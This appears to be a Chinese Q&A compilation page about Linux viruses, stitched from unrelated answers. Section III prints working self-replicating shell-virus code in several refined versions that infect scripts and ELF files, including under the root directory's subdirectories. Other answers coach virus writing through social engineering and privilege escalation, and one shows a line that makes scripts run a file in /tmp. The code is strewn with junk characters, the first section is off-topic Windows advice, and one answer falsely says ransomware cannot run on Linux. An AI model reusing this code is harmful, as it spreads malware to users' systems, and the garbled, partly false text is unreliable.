Ⅰ 有没有人真实遇到过linux桌面的病毒/恶意程序
1.打开windows任务管理器,察看是否有可疑的进程(可以根据杀毒软件的报告或者在网上搜索相关信息来判定)在运行,如果有把它结束。注意在system32目录下的Rundll32.exe本身不是病毒,有可能一个dll文件在运行,他才可能是病毒或恶意程序之类的东西。由于windows任务管理器不能显示进程的路径,因此建议使用杀毒软件自带的进程察看和管理工具来查找并中止可疑进程。然后设法找到病毒程序文件(主要是你所中止的病毒进程文件,另外先在资源管理器的文件夹选项中,设置显示所有文件和文件夹、显示受保护的文件,再察看如system32文件夹中是否有不明dll或exe文件,C:\ProgramFilesC:\DocumentsandSettings\user\LocalSettings\TemporaryInternetFilesC:\DocumentsandSettings\user\LocalSettings\Temp等处是否有不明文件或病毒程序文件),然后删去,搞清楚是否是系统文件再动手。2.有些病毒进程终止不了,提示“拒绝访问”,或者出现“屡禁不止”的情况。根据我的经验,有三种法供尝试:A.可能是某些木马病毒、流氓软件等注册为系统服务了。法是:察看控制面板〉管理工具〉服务,看有没有与之相关的服务(特别是“描述”为空的)在运行,把它停止。再试着中止病毒进程并删除。B.你可以尝试安全模式下(开机后按F8选安全模式)用杀毒软件处理,不行则再按步骤1和2A试一试。C.(慎用)使用冰刃等工具,察看病毒进程的线程信息和模块信息,尝试结束线程和解除模块,再试着删除病毒进程文件和相应的模块。(慎用)3.如果稍微懂得注册表使用的,可以再把相关的注册表键值删除。一般方法:开始〉运行,输入regedit,确定,打开注册表编辑器。编辑〉查找,查找目标为病毒进程名,在搜索结果中将与之有关的键值删除。有时这样做不能遏止病毒,还应尝试使用步骤2中方法。4.某些病毒会劫持IE浏览器,导致乱弹网页的状况。建议用金山毒霸的金山反间谍2006等修复工具。看浏览器辅助对象BHO是否有可疑项目。有就修复它。修复失败时参照1、2来做。5.其他提示:为了更好的操作,请先用优化大师或超级兔子清理所有临时文件和上网时的缓存文件。一般病毒往往在临时文件夹Temp中,这样做可以帮你更快找到病毒文件。开始〉运行,输入msconfig,确定,可以打开“系统配置实用程序”。选择“启动”,察看开机时加载的程序,如果在其中发现病毒程序,可以禁止它在开机时加载。不过此法治标不治本,甚至对某些程序来说无效。还是要按步骤1、2。6.说了这么多,不过有时还是不能解决。只好请教高人或格式化重做系统了,当然不推荐后者参考资料:
Ⅱ 如何编写一个Linux病毒
得对Linux的内核原理很了解才能写出来,否则的话不管你用C还是C++写出的代码生成可执行文件后到别人手一转成源代码什么都看的真真的,起不到病毒的作用了。Linux开源就这一点好,一切都在掌控之中。心中有数!
Ⅲ 如何用Shell病毒技术感染Linux脚本程序
来看一个最原始的shell病毒,代码最能说明问题:
---------------------------------------------------------
#shellvirus I
for file in *
do
cp $0 $file
done
--------------------------------------------------------- . ]2 |0 y9 I* w5 a# ~: b7 M
简单吧?遍历当前文件系统的所有文件,然后覆盖所有文件.但是,我们知道linux是多用户的操作系统,它的文件是具有
保护模式的,所以以上的脚本有可能会报出一大堆的错误,所以它很快就会被管理员发现并制止它的传染.所以我们可以 E1 c. c1 o0 J! K" g% t
为该脚本做个判断,这样隐蔽性就大大增强了: - l1 x* l1 h# D
--------------------------------------------------------- 8 E. n; K- l1 S2 y6 P% ?
#shellvirus II
for file in * 0 n* r2 x5 f2 J; _
do # _, o4 |3 ~- M! T" g7 m7 L5 S
if test -f $file
then
if test -x $file ) g* x* n! W0 Z( B4 G3 |
then ! E" y7 |( G3 Z+ ~9 t
if test -w $file
then
if grep -s echo $file >.mmm
then * o0 ?& x7 b! M5 n
cp $0 $file ; @& P1 Y) {: P4 U$ ~
fi; fi; fi; fi; fi % ~' v' K% C! }* ^8 j7 O: M
done
rm .mmm -f + N- \" T# M1 w0 C
---------------------------------------------------------
ok.我们改进了一下,加了若干的判断,判断文件是否存在,是否文件可执行,是否我们有权限写,再判断它是否是脚本程序 2 D" v x% i' q& N
如果是就cp $0 $file,所以这段代码是感然该系统所有的脚本程序的,危害性还是比较大的.if grep -s echo $file>/.mmm
这句也可以这样写:if file $file | grep -s ‚Bourne shell script‚ > /dev/nul ; then,也就是判断file是否为shell
脚本程序. 8 I5 ^! _6 m- u) _2 {: G( \
但是,脚本病毒一旦在感染完毕之后就什么也不做了,它没有象二进制病毒那样的潜伏的危害性,而且以上的脚本只是简
单的覆盖宿主而已,所以我这里利用了一下传统的二进制病毒的感染机制,效果也不错,看看下面代码:
--------------------------------------------------------- . [! l( n. @* b/ C- s5 a+ m
#infection
head -n 24 $0 > .test<-取自身保存到.test % I' L, W" o% f5 V9 u7 ~. y9 g
for file in *<-遍历文件系统 ; @& c6 ]+ @) D. s$ a# h0 d
do
if test -f $file<-判断是否为文件 ) k7 ~7 p/ v* F& P7 z. N
then
if test -x $file<-判断文件是否可执行
then / V6 h* K; ~: M! [3 D7 R0 G% K
if test -w $file<-判断文件是否可写
then % ^% D; y5 F% V" G
if grep -s echo $file >.mmm<-判断是否为脚本程序
then
head -n 1 $file >.mm<-提取要感染的脚本程序的第一行
if grep -s infection .mm >.mmm<-判断该文件是否已经被感染 A3 Z# g4 k% s$ H+ y8 {
then
rm -f .mm<-已经被感染,则跳过
else<-还未被感染 1 F f$ j% w5 N8 H C' H
cat $file > .SAVEE<-很熟悉吧?借用了传统的二进制文件的感染机制
cat .test > $file
cat .SAVEE >> $file
fi; fi; fi; fi; fi
done
rm .test .SAVEE .mmm .mm -f 0 N+ y; e' C* ]: r
-------------------------------------------------------- 9 h c4 E$ H. _9 j- D
程序的注解足以说明了,其实增加了潜伏的危害性,但还是特容易被发现,没办法的事情,shell脚本一般都是明文的,呵呵.不过
危害性已经相当大了.这段程序用了一个感染标志:infection来判断是否已经被感染,着在程序中可以反应出来. 5 @2 j; M! {4 }' k8 I+ P
ok,为了使上面的代码不容易被发现,我必须优化它,最先考虑的肯定是精练代码:
-------------------------------------------------------- 3 e, o3 d, ^* |
#infection " Z8 o" S% `$ @. M1 Z _
for file in * ;do
if test -f $file && test -x $file && test -w $file ; then 4 v( L5 w3 K3 z) W" G/ ?
if grep -s echo $file > /dev/nul ; then
head -n 1 $file >.mm
if grep -s infection .mm > /dev/nul ; then
rm .mm -f ; else 2 j1 j$ e6 B* E6 G, k: Y. i
cat $file > .SAVEE * u! D7 C( L/ y/ f) r( F% R2 w9 M: z0 l
head -n 13 $0 > $file
cat .SAVEE >> $file
fi; fi; fi $ I8 X M& \& T! Q# j9 b4 u2 _
done
rm .SAVEE .mm -f " f# I. U1 G+ C% @ T) A
--------------------------------------------------------
现在只有两个临时文件的产生了,代码也被精简到了13行.当然可以完全用;来把代码甚至写到1-2行,但这里我只是说明问题,就 4 s% P8 H( m/ A' [ d/ k& k
不写出来了.
好,我们看看,shell病毒还能做哪些有用的事情,有可能我们想感染别的目录的文件,比如根目录或者是/etc,/bin等等,因为大多 & Y) |4 H# |) b% A" w
数有用的系统配置脚本都存放在那些目录下,只要对上述代码稍作改动就可以实现了 % [! @( ]1 A$ R% n/ z
--------------------------------------------------------
#infection
xtemp=$pwd<-保存当前路径
head -n 22 $0 > /.test
for dir in /* ; do<-遍历/目录
if test -d $dir ; then<-如果是目录就cd该目录
cd $dir
for file in * ; do<-遍历该目录文件
if test -f $file && test -x $file && test -w $file ; then<-确定文件是否可执行,可写
if grep -s echo $file > /dev/nul ; then<-确定是否为脚本程序
head -n 1 $file > .mm
if grep -s infection .mm > /dev/nul ; then<-确定是否已经被感染
rm .mm -f ; else & s6 _! g8 h' w, B/ c/ |
cat $file > /.SAVEE<-和前面的感染机制一样感染未被感染的脚本程序 8 T( q& a% [' s
cat /.test > $file
cat /.SAVEE >> $file
fi; fi; fi $ R, l% c) y. f- I
done - j7 l& Q3 j2 w7 H* _
cd ..
fi
done & O( [: O9 L" E e( z; \
cd $xtemp<-返回原目录
rm /.test /.SAVEE .mm -f ( _7 |' x. E: S. Z" s3 M
-------------------------------------------------------------
其实这段代码只感染了/目录下的一层目录.当然我们可以使它感染的更深,只是加几个循环而已.同样shell病毒可以做很多事情
如download后门程序,为机器自动开后门,主动去攻击联网的其他机器,取用户的email来发送传染等等.总之它的实现技术不高深,
但也比较实用,还是值得去说明一下的,呵呵.
同样,我们也可以感染elf文件,但危害性很小,这里不重点讲,给个例程大家理解一下吧
-------------------------------------------------------------
for file in * ;do
if test -f $file && test -x $file && test -w $file ; then ; J/ ?- ~# s% h; [7 i6 @- f
if file $file | grep -s ‚ELF‚ > /dev/nul ; then
mv $file .$file
head -n 9 $0 > $file
fi; fi
done 6 H* o% e: l9 e- X. Y' U! d j
.$0' ]% |# H8 ?/ F
Ⅳ 病毒,实用性软件,Linux操作系统的编程软件是什么
语言是具有相通性的,意思就是说你掌握一门以后,学另外一门会比较简单。入门时候你学习一门就可以了。如果你真的想从一门具体的语言下手,各种语言有自己的优劣,下面介绍点,你可以选择其中一种。
面向过程语言:
汇编:非常强大,强大到你可以操纵CPU的寄存器,内存以及任何你有权利可以操纵的硬件。学起来难度有一点,看你上面的意思是想写病毒,那么这门是不错的选择。
C语言:强大,没有了对CPU的直接操纵,可以操作内存。非常灵活,推荐。
面向对象:
C++,C#等:微软推崇,好处是有微软支持,速度快,.net技术使其在网站这一块有一席之地。绝大部分个人用户电脑是windows,所以是游戏编程的不二之选。
JAVA:非常不错的语言,SUN公司产品。最大优点莫过于其跨平台性。这点是借助于它自己的虚拟机完成的,所以,编译后的文件在windows下正常运行,拷贝到linux下依然可以正常运行。加上jsp技术的成熟,在网站这一块更是重中之重。缺点就是速度慢。
看你的样子是想学写病毒,不过觉得你认识有点误区,病毒是在别人电脑上跑才有用的,在自己机器上跑就没啥意思了。所以无论你用啥写,都是要传到别人电脑上才行(不传也可以,但一定要在别人机器的CPU和内存上运行)。这要求你有一定互联网知识。或者你可以用欺骗的手段,将自己的病毒让他们自己下载。比如告诉他们这是一个善意的东西。推荐语言就是C和汇编了。
到别人电脑后,要想办法让它运行。一般病毒都是搞窃取和破坏的,主要是一些重要文件,而操作系统对这些是有保护的。所以你要让对方使用系统管理员的身份运行你的程序,或者利用操作系统的漏洞提升你的病毒进程的权利。windows常中病毒除了跟其本身缺陷有关外,还有一大部分原因是用户不懂得自保,比如很多人的系统管理员是没有密码的。而linux在使用过程中对用户有严格限制,而且很多人不推荐用超级用户root身份使用linux.
linux下什么语言都可以用,但linux本身是C写的,他提供的系统调用都是C的函数,用C很方便。当然还有其他很多意想不到的好处,至于编译器那么GUN的GCC不错,同时它也是C++的编译器。至于IDE,我一直使用的是VIM,随便你用什么了。我见过用记事本写JAVA的。
Ⅳ Linux系统平台下病毒种类主要有哪些
Linux系统平台下的病毒主要分为以下4类:
1、可执行文件型病毒,这个主要就是指能够寄生在文件中的以文件为主要感染对象的病毒。
2、蠕虫(worm)病毒,Linux平台下的蠕虫病毒极为猖獗,像利用系统漏洞进行传播的ramen、lion、Slapper等,这些病毒都感染了大量的Linux系统,造成了巨大的损失。
3、脚本病毒,这样的多为使用shell脚本语言编写的病毒,这类病毒编写较为简单,但破坏力却同样惊人,像以.sh结尾的脚本文件,一个短短数十行的shell脚本就可以在短时间内感染硬盘中所有的脚本文件。
4、后门程序,从增加系统超级用户帐号的简单后门,到利用系统服务加载、共享库文件注射、rootkit工具包,甚至可以装载内核模块(LKM)而产生的后门,Linux平台下的后门技术发展非常成熟,隐蔽性强,难以清除,已经成为Linux系统管理员极为头疼的问题。
Ⅵ 有多少人擅长在linux下 写病毒和木马
只有在linux的基底层写病毒,才可能在所有linux系统之间有效传播。否则没什么太多意义。目前为止,这样的病毒很少,所以现在的linux可以不装杀毒软件。我的linux就没装。
Ⅶ 如何用shell病毒技术感染linux脚本程序
你这个思想很危险啊。。。echo "/bin/bash /tmp/test.sh" >> 脚本文件名字
这样运行脚本就会运行你tmp下的test.sh文件
chmod 777 /tmp/test.sh给权限
里面写。。。
Ⅷ 勒索病毒能在Linux上运行吗
勒索病毒是通过电脑Windows系统的漏洞传播的,Linux系统和Windows的系统并不一样,无法在Linux系统上传播和运行的。
Ⅸ linux,unix,windows,ios,安卓的病毒木马都可以用c语言来编写吗
C语言当然可以编写病毒,事实上很多程序都是用C/C++编写出来的。 编程语言本身没有“贵贱”之分,只用用好了,都是相当强的;区别在于主要适用范围、编写的难易程序、执行效率的高低、学习的难易程度,等等。 C语言只是一种计算机程序的编写格式规范,到至于可以编写出来什么样的程序,还要看你所用的C语言编译器,(比如TC,VC,LCC,GCC等,太多了)。 如果有编写windows程序,就不能用TC,它只能编写DOS程序,而应该用VC,LCC,C++Builder等编译工具) 编写出来的程序肯定要调用操作系统提供的功能,如编windows程序,就要调用Win32 API,Dos程序则调用的是DOS中断,编程实际上就是对这些操作系统所提供功能的调用。 现在的病毒很多都是用常用的编程工具编写的,如VC++,delph,VC,Win32汇编等
Ⅹ linux 系统为什么很安全 ,不中病毒
实际上Linux只是一个内核,具体的操作系统发行版有很多,但是Linux的安全性确实远高于Windows 10以前的版本。原因如下:
1、Linux最早是基于x86处理器开发的,这点与Windows一样,但由于微软与英特尔的特殊关系使得微软可以使用很多英特尔处理器上的秘密特性,这些特性极大的提高了Windows系统在英特尔平台上的运行效率,同时封闭的生态也滋生了很多由于特性造成的硬件漏洞,这一问题是随着虚拟化技术的成熟而被逐步解决的;
2、Linux系统一般与GNU软件相配合才能形成完整的操作系统,GNU作为MIT顶尖人才社区产物,程序质量有很高的保证,而且开源软件往往比闭源软件更容易暴露问题,所以GNU/Linux系统在上个世纪就经历了完善期,黑客组织和情报机关几乎不能找到世界上所有专家都发现不了的安全隐患,如果发现了也很难隐蔽地利用;
3、极度简单的工程结构:众所周知,越简单的机械越难出错误,相比于长期迎合新需求的Windows,Linux各分发版都更加简单高效,这使得Linux不是最丰富的平台确是最实用的平台,这也是科研人员十分青睐它的原因。